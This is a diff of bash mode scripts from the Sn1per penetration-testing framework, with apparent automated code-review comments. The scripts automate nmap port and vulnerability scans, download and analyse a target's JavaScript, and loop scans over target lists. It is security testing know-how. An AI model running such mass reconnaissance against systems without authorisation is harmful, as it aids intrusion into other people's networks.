/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
source $INSTALL_DIR/modes/sc0pe.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
loot
exit
fi
if [[ "$MODE" = "port" ]]; then
if [[ -z "$PORT" ]]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
exit
fi
fi
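Review bot: the `-p $PORT` branch writes its XML to `nmap-$TARGET-tcp-port$PORT.xml` but then runs `xsltproc ... $LOOT_DIR/nmap/nmap-$TARGET.xml`, so the HTML report is built from an older full-scan file or not at all; pass the same filename to both. Three points on the scan itself: the banner says "PERFORMING TCP PORT SCAN" but `nmap $NMAP_OPTIONS -sU -sS ... -p $FULL_PORTSCAN_PORTS` also UDP-scans the full port list, which is what makes this mode slow; `--script=/usr/share/nmap/scripts/vulners` runs without `-sV`, and vulners only fires on ports with a detected service version/CPE, so it produces no findings here; and `sed -r "s/</\&lh\;/g"` replaces `<` with `&lh;`, which is not an entity (`&lt;` was meant), so the text is mangled for readers and still not safe to embed in HTML. The Slack branch also posts `nmap-$TARGET-udp.txt`, which this mode never writes, and the trailing `port` mode check at the end of the file belongs in its own mode file.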

54
modes/fullportscan.sh Normal file

@@ -0,0 +1,54 @@
if [[ "$FULLNMAPSCAN" = "0" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
else
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
fi
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
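Review bot: `$LOOT_DIR/nmap/nmap-$TARGET-udp` is never written anywhere in this file (the only scan is the single combined `nmap $NMAP_OPTIONS -sU -sS ... | tee $LOOT_DIR/nmap/nmap-$TARGET`), so the `sed` that builds `nmap-$TARGET-udp.txt` always produces an empty file and the later `slack.sh postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"` posts that empty file; either run a separate `nmap -sU ... | tee $LOOT_DIR/nmap/nmap-$TARGET-udp` or drop the udp post-processing and its Slack call. Two smaller points in the same block: the second `rm -f $LOOT_DIR/nmap/nmap-$TARGET` is a no-op repeat of the earlier one, and the `s/</\&lh\;/g` substitution writes `&lh;`, which is not an HTML entity (the XSL/HTML report will show it literally); `&lt;` is what is wanted. Separately, `-sU -sS` needs raw-socket privileges, and nothing here checks `$EUID` before invoking nmap, so an unprivileged run fails inside the pipe and the script carries on with an empty XML; a `[[ $EUID -eq 0 ]]` guard (or documenting the root requirement for `FULLNMAPSCAN=1`) would make the failure explicit. `--script=vulners` would also resolve the script via nmap's own script database rather than the hard-coded `/usr/share/nmap/scripts/` prefix.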


@@ -0,0 +1,36 @@
mkdir -p $LOOT_DIR/web/javascript/$TARGET 2> /dev/null
cd $LOOT_DIR/web/javascript/$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp'
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | egrep "\/\/|\/\*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-comments.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING ALL JAVASCRIPT LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-urls.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING LINKFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $PLUGINS_DIR/LinkFinder/
for a in `ls $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null`; do echo "Analyzing - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && python3 linkfinder.py -d -i $a -o cli 2> /dev/null | egrep -v "application\/|SSL error" > $LOOT_DIR/web/javascript-linkfinder-$TARGET-$FILENAME.txt 2> /dev/null; done;
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING PATH RELATIVE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-path-relative.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt
sort -u $LOOT_DIR/web/javascript-$TARGET-urls.txt $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 2> /dev/null > $LOOT_DIR/web/javascript-$TARGET-urls-sorted.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt
WEB_JAVASCRIPT_ANALYSIS="0"
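Review bot: the third download loop (the one over links that do not contain `http`) logs `Downloading - https://$a` but passes the bare `$a` to `curl`, so curl fetches it over its default scheme rather than https and the log line misreports what was retrieved; pass `"https://$a"` to curl as well. In all three loops `FILENAME` is only the URL's last path component (`awk -F/ '{print $(NF-0)}'`), so two scripts with the same basename from different paths or hosts overwrite each other in `$LOOT_DIR/web/javascript/$TARGET/`; including the host and path (or a hash of the full URL) in the filename keeps every fetched file. Note also that `egrep "\.js"` with only `.json|.jsp` excluded still matches URLs where `.js` occurs mid-path, and that the closing `WEB_JAVASCRIPT_ANALYSIS="0"` silently disables the analysis for any later `source` of this file in the same run; a one-line comment stating that this is intentional (run once per scan) would save the next reader a search.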

73
modes/massportscan.sh Normal file

@@ -0,0 +1,73 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massportscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m fullportonly --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
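Review bot: the "Finished Sn1per scan" notification and its Slack call sit outside the `if [[ "$REPORT" = "1" ]]` block, so they fire even when no target was scanned and, on that path, with `$TARGET` unset; move them inside the block (or guard on `$TARGET`). The header comment `# MASSWEB MODE` is also wrong for this file, which implements `massportscan`. Two consistency points against the sibling mass modes: the workspace branch here sends the "Started" message to Slack only and never appends it to `$LOOT_DIR/scans/notifications_new.txt` as massvulnscan does, and the status line prints "Saving loot to $LOOT_DIR" while the directories being created are under `$WORKSPACE_DIR`. Finally, `for a in \`cat $FILE\`` word-splits and globs each line of the target file; `while read -r a; do ...; done < "$FILE"` reads it line by line and avoids a line with spaces being turned into extra `sniper` arguments.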

74
modes/massvulnscan.sh Normal file

@@ -0,0 +1,74 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massvulnscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m vulnscan --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
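Review bot: this file is a verbatim copy of massportscan.sh apart from `-m vulnscan` in `args`, so the ~70 duplicated lines (banner, workspace `mkdir` set, notification and loop) should be a single shared function parameterised by the sub-mode; as it stands every fix has to be applied per copy, and both copies already carry the same defects (the `# MASSWEB MODE` header, the "Finished" notification outside the `REPORT` check with `$TARGET` possibly unset, the "Saving loot to $LOOT_DIR" message while creating `$WORKSPACE_DIR`). The `mkdir` set here also omits `vulnerabilities/` and `scans/`, which masswebscan.sh creates; if the vulnscan sub-mode writes there, this mode needs them too.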

73
modes/massweb.sh Normal file

@@ -0,0 +1,73 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massweb" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m web --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
#echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
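Review bot: the `tasks.txt` append in the workspace branch is commented out and the non-workspace branch has none, so `massweb` runs are never recorded in `$LOOT_DIR/scans/tasks.txt` while massportscan and massvulnscan record theirs; either restore the line in both branches or add a comment explaining why this mode is excluded. The "Finished" notification here has the same problem as in the other mass modes: it is outside the `if [[ "$REPORT" = "1" ]]` block and references `$TARGET`, which is unset when the loop did not run.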

53
modes/masswebscan.sh Normal file

@@ -0,0 +1,53 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "masswebscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
